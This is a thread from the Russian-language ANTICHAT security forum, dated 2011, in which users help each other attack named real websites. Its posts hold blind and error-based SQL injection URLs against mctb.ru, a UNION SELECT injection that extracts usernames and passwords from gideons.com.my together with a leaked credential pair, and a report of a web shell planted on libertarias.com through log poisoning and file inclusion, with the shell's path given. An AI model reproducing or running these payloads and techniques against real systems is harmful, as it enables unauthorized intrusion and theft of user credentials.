ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.05.2011, 16:50
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084
Репутация:
3
|
|
Сообщение от XAMEHA
Посимвольным перебором ASCII через AND или ORDER BY.
Там фильтруется select(юнион кстати тоже)
http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- - >> true
http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- select >> false
А без селекта ты ничего не добъешься, кроме вывода стандартных функций, ну узнаешь ты номер версии посимвольным перебором, и?
Сообщение от ta-kyn
2Tigger я ручками перебирал. 1. Кстати, что можете посоветовать для автоперебора? (с поддержкой прокси желательно) 2. Странно что в мод_секьюрити не запрещена ф-ия copy()? 3. Для инклуда логов есть только 1-а попытка (при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&c=;
user agent:
Ну а дальше масса вариантов.
http://www.libertarias.com/wso.php
Пасс держи в пм по понятным причинам, также по понятным причинам пришлось запороть оба лога.
Cам инклюд в коде
index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$busqueda[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
include([/COLOR][COLOR="#DD0000"]"op/[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Тоже пофикшен, по понятным причинам, т.к. автор вопроса получил и ответ и шелл в пм.
|
|
|
23.05.2011, 03:03
|
|
Новичок
Регистрация: 17.04.2011
Сообщений: 7
Провел на форуме:
1531
Репутация:
0
|
|
Shocked!
Код:
http://mctb.ru/forum?a=new'
А что с этим можно сделать? |
|
|
|
23.05.2011, 04:32
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084
Репутация:
3
|
|
Сообщение от SaNn
Shocked!
Код:
http://mctb.ru/forum?a=new'
А что с этим можно сделать? Ну раскрытие путей точно есть, дальше без кода сразу не определить.
Я думаю тебе будет полезно(пробелы убрать):
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false
http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)) ,name_const(version(),3))a)
|
|
|
|
23.05.2011, 05:21
|
|
Новичок
Регистрация: 17.04.2011
Сообщений: 7
Провел на форуме:
1531
Репутация:
0
|
|
Сообщение от DIEZalok
Ну раскрытие путей точно есть, дальше без кода сразу не определить.
Я думаю тебе будет полезно(пробелы убрать):
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false
http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)) ,name_const(version(),3))a)
Слушай, а где можно почитать, про то, что ты сделал?
Вроде похоже на SQL инъекцию. Но хоть ты убей не могу понять, как она тут работает...
|
|
|
|
23.05.2011, 05:23
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
|
|
|
|
23.05.2011, 05:33
|
|
Новичок
Регистрация: 17.04.2011
Сообщений: 7
Провел на форуме:
1531
Репутация:
0
|
|
Ок. Спрошу прямо:
В чем разница между проведением инъекции в запросах вида "*.php?id=1" и "*/comments/1".
|
|
|
|
23.05.2011, 10:00
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Ни в чем это всего лишь mod_rewrite, т.е. ЧПУ (человеко понятные ссылки), по всей своей логике, скорее всего /comments/1 будет обрабатываться как .php?comments=1
|
|
|
|
23.05.2011, 14:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Expl0ited
Ни в чем это всего лишь mod_rewrite, т.е. ЧПУ (человеко понятные ссылки), по всей своей логике, скорее всего /comments/1 будет обрабатываться как .php?comments=1
Но кроме этого, mod_rewrite может поддерживать передачу цифр, а так называемый обход ЧПУ позволит подставлять всё что угодно, так что надеться на это не нужно и фильтровать данные в любом случае. Яркий пример - DLink.
|
|
|
|
23.05.2011, 16:09
|
|
Новичок
Регистрация: 16.05.2011
Сообщений: 8
Провел на форуме:
2504
Репутация:
0
|
|
проблема в следуйщем не могу вывести нужные колонки
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%2 9,4,5+from+plus_signup+--
в чем ошибка
|
|
|
|
23.05.2011, 17:10
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от kartes1984
проблема в следуйщем не могу вывести нужные колонки
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%2 9,4,5+from+plus_signup+--
в чем ошибка
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%2 9,4,5+from+test_db.plus_signup+--
jeff;123456
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
